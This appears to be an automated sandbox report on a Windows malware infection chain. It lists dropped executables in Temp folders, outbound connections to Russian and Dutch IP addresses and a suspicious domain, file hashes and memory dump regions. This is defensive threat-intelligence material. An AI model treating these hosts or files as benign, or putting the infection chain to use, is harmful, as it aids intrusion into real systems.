C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE

"C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe

"C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe"

C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe

"C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe

"C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 150.171.28.10:443 g.bing.com tcp
US 150.171.28.10:443 g.bing.com tcp
US 150.171.28.10:443 g.bing.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
US 150.171.28.10:443 g.bing.com tcp
US 150.171.28.10:443 g.bing.com tcp
US 150.171.28.10:443 g.bing.com tcp
US 150.171.28.10:443 g.bing.com tcp
US 150.171.28.10:443 g.bing.com tcp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta

MD5 42bcecbc4a9d0c9e72120f0a60102147
SHA1 026d375bc2a684027fb8532af83ce2991509e1f1
SHA256 303332f5d6160d3604c26f26245225fcdb46887b69f741b346b35948cbb1b23b
SHA512 d6438e784658959e18c3b867bac7e406131011dc5146db4ce9781469e4cabee4630dd6b79106b7b507fe03e748a51516855dcae59f4ac0b2ab29416f339c4498

memory/4824-2-0x0000000002A60000-0x0000000002A96000-memory.dmp

memory/4824-3-0x0000000005210000-0x0000000005838000-memory.dmp

memory/4824-4-0x00000000051A0000-0x00000000051C2000-memory.dmp

memory/4824-5-0x0000000005970000-0x00000000059D6000-memory.dmp

memory/4824-6-0x00000000059E0000-0x0000000005A46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vad1iwme.c10.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4824-16-0x0000000005B50000-0x0000000005EA4000-memory.dmp

memory/4824-17-0x0000000006040000-0x000000000605E000-memory.dmp

memory/4824-18-0x0000000006090000-0x00000000060DC000-memory.dmp

memory/4824-19-0x0000000007780000-0x0000000007DFA000-memory.dmp

memory/4824-20-0x0000000006580000-0x000000000659A000-memory.dmp

memory/4824-22-0x00000000075A0000-0x0000000007636000-memory.dmp

memory/4824-23-0x0000000007530000-0x0000000007552000-memory.dmp

memory/4824-24-0x00000000083B0000-0x0000000008954000-memory.dmp

C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE

MD5 3147e388f1f2ad94f26aee55a4267b8c
SHA1 b3dfd5bb152b1b8e338586ea1e2d240cde6503b3
SHA256 49ac9312c49ff99d5af392d17450747038fcbd6f319ebf981916fcf44120aa2b
SHA512 720b48b08c502c153ecdaeb6fa8a2e374187a71655a88493dc70b266fe16ce88d342aaceefbe5a35fa9db93911510baee7fb578786e44ae6da637369f56443e9

memory/1244-32-0x0000000000400000-0x000000000089F000-memory.dmp

memory/4328-46-0x0000000000230000-0x00000000006CF000-memory.dmp

memory/1244-48-0x0000000000400000-0x000000000089F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe

MD5 19668940080169c70b830bed8c390783
SHA1 5e6b72e52abc7d221d512111e39cbdd3f2ad40c1
SHA256 cdbc641b8c23b5699f899b408394ecfc946af9ac7a38c5d44c78a4a938e7b02c
SHA512 c322eba01ff4544b8077ec400f15ecffd3b66f89e0e0e26946224771c1ffb9c687ff4adc2e0a5e6b119766b3c8300971cfc2c990ff48346d9d3d514ab5d4bed2

memory/1624-63-0x00007FF615DB0000-0x00007FF615E4F000-memory.dmp

memory/3424-65-0x00000000091C0000-0x0000000009265000-memory.dmp

memory/1624-68-0x00007FF615DB0000-0x00007FF615E4F000-memory.dmp

memory/3424-64-0x00000000091C0000-0x0000000009265000-memory.dmp

memory/4328-69-0x0000000000230000-0x00000000006CF000-memory.dmp

memory/4328-70-0x0000000000230000-0x00000000006CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe

MD5 e82c4c3f7a2994eeecc1f81a5e4a4180
SHA1 660820f778073332dcd5ec446d2fcf00de887abd
SHA256 11eec5d71c7fadae9d7176448d8fff3de44ec8d3b4df86f0eca59e06adf202d3
SHA512 4d3e42e68b9fa6330edfee677ad55ae24964c33d6fd2d25ba6c2876d80f8d9cbc999c6e27192ce58a45559d00b3c0bc71ddbee1ad8d6fd7083b705ef5cf84d76

memory/4980-89-0x0000000000230000-0x00000000006CF000-memory.dmp

memory/4980-91-0x0000000000230000-0x00000000006CF000-memory.dmp

memory/4328-92-0x0000000000230000-0x00000000006CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe

MD5 02579a797e919dcaf5758fbcbe34b093
SHA1 7668fff0888f4c7ad7a83b24f8c6d4009c10e534
SHA256 0a63a310dfc4ce680c96f72f5b9c9559f9e6d9c3d99f48c8782ee43c56a8728c
SHA512 2b99b620ca06f03a1924c0ab2feef96142df6ff16558d30c37e8b3e5602e5d5b2ecd4e7bd3b4499ef64a0eb32cb136821442e79b3aa66caf42467c749116e5f5